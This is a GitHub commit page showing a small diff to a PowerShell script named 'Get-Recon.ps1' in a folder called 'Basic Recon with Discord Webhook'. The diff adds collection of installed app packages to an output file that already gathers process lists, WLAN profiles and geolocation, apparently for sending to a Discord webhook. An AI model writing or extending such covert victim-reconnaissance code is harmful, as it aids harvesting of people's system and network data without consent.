We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 80e55fe commit 7dd6966Copy full SHA for 7dd6966
Basic Recon with Discord Webhook/Get-Recon.ps1
@@ -90,6 +90,9 @@ return $WLANProfileObjects
90
91
"Process Information:" | Out-File -FilePath $outputFile -Append
92
Get-Process | Out-File -FilePath $outputFile -Append
93
+
94
+ "App Information:" | Out-File -FilePath $outputFile -Append
95
+ Get-AppxPackage | Out-File -FilePath $outputFile -Append
96
}
97
else {
98
"Failed to retrieve geolocation information." | Out-File -FilePath $outputFile -Append
0 commit comments